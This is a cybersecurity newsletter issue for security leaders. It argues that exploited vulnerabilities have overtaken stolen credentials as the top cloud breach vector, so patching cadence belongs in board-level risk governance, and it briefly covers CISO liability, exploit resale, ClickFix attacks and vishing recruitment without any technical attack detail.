One story. Gone deep.

For years, the conventional wisdom was clean: attackers don't hack in — they log in. Stolen credentials. Phished passwords. Compromised MFA. Identity is the perimeter.

That was true. It's not anymore.

Google Cloud's 2026 Threat Horizons Report — built on Mandiant's incident response data — puts a number on the shift: 44.5% of cloud breaches now start with exploited vulnerabilities. Stolen credentials dropped to 27%. Exploitation just overtook credentials as the number one breach vector. First time ever.

The reversal has been building. Mandiant's data shows the time from vulnerability disclosure to active exploitation has compressed from weeks to days. Sometimes hours. We talked about CrowdStrike's 29-minute breakout stat in Pulse #05 — that was lateral movement speed. This is the step before that. The front door is getting kicked in faster than most organizations can read the advisory.

Here's where the structural problem lives. Most organizations still run vulnerability management on a monthly cadence. Monthly scans. Monthly prioritization meetings. Monthly patch windows coordinated with change advisory boards that meet — you guessed it — monthly.

A monthly program against a daily threat isn't behind schedule. It's mathematically certain to lose.

The question that matters isn't technical — it's governance. Who owns your patching cadence? Is it an IT operations decision managed alongside server uptime and change windows? Or is it a risk management decision reviewed at the same level as financial exposure? Because when exploitation overtakes credentials, your patching cadence is a direct measure of your breach exposure. Not indirect. Not a contributing factor. The primary one.

If your vulnerability management program reports into IT operations and nobody at the leadership level has reviewed the patching cadence in the last quarter — that's not a gap. That's a sign you need help. Not more tools. Not a faster scanner. Someone who can elevate that conversation to where the risk decisions actually get made.

Sources: Google Cloud 2026 Threat Horizons Report, Mandiant M-Trends, CrowdStrike 2026 Global Threat Report

What else matters this week.

Splunk's 2026 CISO Report says 78% of CISOs now cite personal liability as a top concern — a 22-point increase year-over-year. CISOs are declining roles, requiring personal liability insurance before accepting positions, and some are walking away from the title entirely. We wrote about this governance gap two weeks ago: the structural flaw where the CISO carries personal liability but the board controls the budget. The industry just put a number on it. If you can't attract or retain senior security leadership, the reason might not be compensation. It might be structure. via Splunk

Google's Threat Analysis Group tracked 23 separate exploits — originally developed by a commercial surveillance vendor — through a supply chain that should concern everyone. The path: surveillance vendor to Russian intelligence services to Chinese cybercriminal groups. Eighteen months from government tool to criminal commodity. The chain now targets iOS devices running versions below 17.3, primarily for cryptocurrency theft. Your assumption that nation-state tools stay with nation-states is dead. The exploit supply chain doesn't respect classification levels. It follows money. via Google TAG

We flagged ClickFix in Pulse #05 — now Huntress Labs confirms copy-paste social engineering has become the dominant infection vector. 53% of all malware infections. Eighteen months from novel technique to majority. No vulnerability, no zero-day — the user runs the command themselves. Your endpoint protection can't stop commands the user deliberately executes. This is a training problem dressed up as a technical one. via Huntress Labs

A group called SLH is publicly recruiting women on Telegram for vishing operations. Prepared scripts. IT help desk targets. $500 to $1,000 per successful call. They're paying a premium for female voices specifically to enhance social engineering credibility. Cybercrime as gig economy — public recruitment, published pay scales. Same lesson as ClickFix: when your people are the perimeter, your training is your firewall. And your help desk is your authentication boundary — treat it like one. via Dataminr, The Hacker News

Not every signal needs action.

Every quarter, a new report predicts the end of the security analyst. This quarter's flavor: AI-powered SOCs will make human analysts obsolete within two years. The same industry that can't automate patch management is going to fully automate threat detection. AI is a force multiplier for analysts, not a replacement. It makes good analysts faster. It doesn't make zero analysts sufficient. Anyone telling you otherwise is selling the replacement.

No answer. Just the question.

Exploitation just overtook credentials as the #1 breach vector. When was the last time your patching cadence was reviewed as a board-level risk decision — not an IT operations task?

Michael Faas is a fractional CTO/CISO helping growth-stage companies navigate complexity without building bloated security programs. More at echocyber.io.